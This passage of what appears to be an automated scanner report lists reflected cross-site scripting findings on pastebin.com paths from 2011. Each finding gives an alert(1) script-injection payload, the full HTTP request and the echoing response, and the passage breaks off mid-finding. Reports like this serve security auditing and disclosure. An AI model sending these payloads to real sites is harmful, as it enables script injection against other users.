The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca1b0"><script>alert(1)</script>e6b4ca5c2bf was submitted in the REST URL parameter 2. This input was echoed as ca1b0\"><script>alert(1)</script>e6b4ca5c2bf in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/adsca1b0"><script>alert(1)</script>e6b4ca5c2bf /iframes/160x600.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/adsca1b0\"><script>alert(1)</script>e6b4ca5c2bf /iframes/160x600.html"/>...[SNIP]...
1.9. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88792"><script>alert(1)</script>442cfd43152 was submitted in the REST URL parameter 3. This input was echoed as 88792\"><script>alert(1)</script>442cfd43152 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/ads/iframes88792"><script>alert(1)</script>442cfd43152 /160x600.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:39 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=21; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10594 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/ads/iframes88792\"><script>alert(1)</script>442cfd43152 /160x600.html"/>...[SNIP]...
1.10. http://pastebin.com/etc/ads/iframes/160x600.html [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/160x600.html
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5448e"><script>alert(1)</script>4efdc9546fc was submitted in the REST URL parameter 4. This input was echoed as 5448e\"><script>alert(1)</script>4efdc9546fc in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/ads/iframes/160x600.html5448e"><script>alert(1)</script>4efdc9546fc HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:39 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=23; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10594 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/ads/iframes/160x600.html5448e\"><script>alert(1)</script>4efdc9546fc "/>...[SNIP]...
1.11. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2ff"><script>alert(1)</script>c79d6fd4ca4 was submitted in the REST URL parameter 1. This input was echoed as ab2ff\"><script>alert(1)</script>c79d6fd4ca4 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etcab2ff"><script>alert(1)</script>c79d6fd4ca4 /ads/iframes/728x90.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10611 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etcab2ff\"><script>alert(1)</script>c79d6fd4ca4 /ads/iframes/728x90.html"/>...[SNIP]...
1.12. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeee0"><script>alert(1)</script>1adcfa6439a was submitted in the REST URL parameter 2. This input was echoed as eeee0\"><script>alert(1)</script>1adcfa6439a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/adseeee0"><script>alert(1)</script>1adcfa6439a /iframes/728x90.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10592 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/adseeee0\"><script>alert(1)</script>1adcfa6439a /iframes/728x90.html"/>...[SNIP]...
1.13. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c601a"><script>alert(1)</script>f7bf1eddb58 was submitted in the REST URL parameter 3. This input was echoed as c601a\"><script>alert(1)</script>f7bf1eddb58 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/ads/iframesc601a"><script>alert(1)</script>f7bf1eddb58 /728x90.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:39 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=21; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10592 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/ads/iframesc601a\"><script>alert(1)</script>f7bf1eddb58 /728x90.html"/>...[SNIP]...
1.14. http://pastebin.com/etc/ads/iframes/728x90.html [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/ads/iframes/728x90.html
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1424"><script>alert(1)</script>aa0b6363e32 was submitted in the REST URL parameter 4. This input was echoed as a1424\"><script>alert(1)</script>aa0b6363e32 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/ads/iframes/728x90.htmla1424"><script>alert(1)</script>aa0b6363e32 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:40 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=24; expires=Tue, 04-Oct-2011 18:10:40 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10592 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/ads/iframes/728x90.htmla1424\"><script>alert(1)</script>aa0b6363e32 "/>...[SNIP]...
1.15. http://pastebin.com/etc/social/index.html [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b6c5"><script>alert(1)</script>0582bb56850 was submitted in the REST URL parameter 1. This input was echoed as 9b6c5\"><script>alert(1)</script>0582bb56850 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc9b6c5"><script>alert(1)</script>0582bb56850 /social/index.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=15; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10599 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc9b6c5\"><script>alert(1)</script>0582bb56850 /social/index.html"/>...[SNIP]...
1.16. http://pastebin.com/etc/social/index.html [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f4fe"><script>alert(1)</script>732c7f33cfd was submitted in the REST URL parameter 2. This input was echoed as 7f4fe\"><script>alert(1)</script>732c7f33cfd in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/social7f4fe"><script>alert(1)</script>732c7f33cfd /index.html HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10599 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/social7f4fe\"><script>alert(1)</script>732c7f33cfd /index.html"/>...[SNIP]...
1.17. http://pastebin.com/etc/social/index.html [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/etc/social/index.html
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faf56"><script>alert(1)</script>0f8d2babee7 was submitted in the REST URL parameter 3. This input was echoed as faf56\"><script>alert(1)</script>0f8d2babee7 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /etc/social/index.htmlfaf56"><script>alert(1)</script>0f8d2babee7 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:39 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:39 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10580 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/etc/social/index.htmlfaf56\"><script>alert(1)</script>0f8d2babee7 "/>...[SNIP]...
1.18. http://pastebin.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7dc"><script>alert(1)</script>bda8880cef7 was submitted in the REST URL parameter 1. This input was echoed as cc7dc\"><script>alert(1)</script>bda8880cef7 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icocc7dc"><script>alert(1)</script>bda8880cef7 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1; __utma=47852966.871251161.1315350535.1315350535.1315350535.1; __utmb=47852966.1.10.1315350535; __utmc=47852966; __utmz=47852966.1315350535.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php; __qca=P0-143015204-1315350538245
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:11:06 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=13; expires=Tue, 04-Oct-2011 18:11:06 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10589 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/favicon.icocc7dc\"><script>alert(1)</script>bda8880cef7 "/>...[SNIP]...
1.19. http://pastebin.com/i/fixed.css [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/fixed.css
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3ddd"><script>alert(1)</script>cf73614236c was submitted in the REST URL parameter 1. This input was echoed as d3ddd\"><script>alert(1)</script>cf73614236c in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /id3ddd"><script>alert(1)</script>cf73614236c /fixed.css?1 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=17; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/id3ddd\"><script>alert(1)</script>cf73614236c /fixed.css?1"/>...[SNIP]...
1.20. http://pastebin.com/i/fixed.css [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/fixed.css
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4864d"><script>alert(1)</script>7c325f7bd4e was submitted in the REST URL parameter 2. This input was echoed as 4864d\"><script>alert(1)</script>7c325f7bd4e in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/fixed.css4864d"><script>alert(1)</script>7c325f7bd4e ?1 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=19; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10564 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/i/fixed.css4864d\"><script>alert(1)</script>7c325f7bd4e ?1"/>...[SNIP]...
1.21. http://pastebin.com/i/style.css [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/style.css
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99db1"><script>alert(1)</script>5c32890a4a was submitted in the REST URL parameter 1. This input was echoed as 99db1\"><script>alert(1)</script>5c32890a4a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i99db1"><script>alert(1)</script>5c32890a4a /style.css?12 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=16; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10583 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/i99db1\"><script>alert(1)</script>5c32890a4a /style.css?12"/>...[SNIP]...
1.22. http://pastebin.com/i/style.css [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/i/style.css
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4cc"><script>alert(1)</script>b321a1af605 was submitted in the REST URL parameter 2. This input was echoed as ed4cc\"><script>alert(1)</script>b321a1af605 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /i/style.cssed4cc"><script>alert(1)</script>b321a1af605 ?12 HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:38 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=18; expires=Tue, 04-Oct-2011 18:10:38 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10585 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/i/style.cssed4cc\"><script>alert(1)</script>b321a1af605 ?12"/>...[SNIP]...
1.23. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/js/ZeroClipboard.swf
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ae8"><script>alert(1)</script>cd11aa5c8e0 was submitted in the REST URL parameter 1. This input was echoed as 25ae8\"><script>alert(1)</script>cd11aa5c8e0 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js25ae8"><script>alert(1)</script>cd11aa5c8e0 /ZeroClipboard.swf HTTP/1.1 Host: pastebin.com Proxy-Connection: keep-alive Referer: http://pastebin.com/bq8xJPMn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cookie_key=1
Response
HTTP/1.1 404 Not Found Server: nginx/1.0.4 Date: Tue, 06 Sep 2011 18:10:49 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.6 Set-Cookie: cookie_key=7; expires=Tue, 04-Oct-2011 18:10:49 GMT; path=/; domain=.pastebin.com Vary: Accept-Encoding Content-Length: 10562 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Con...[SNIP]... <meta property="og:url" content="http://pastebin.com/js25ae8\"><script>alert(1)</script>cd11aa5c8e0 /ZeroClipboard.swf"/>...[SNIP]...
1.24. http://pastebin.com/js/ZeroClipboard.swf [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pastebin.com
Path:
/js/ZeroClipboard.swf
Issue detail
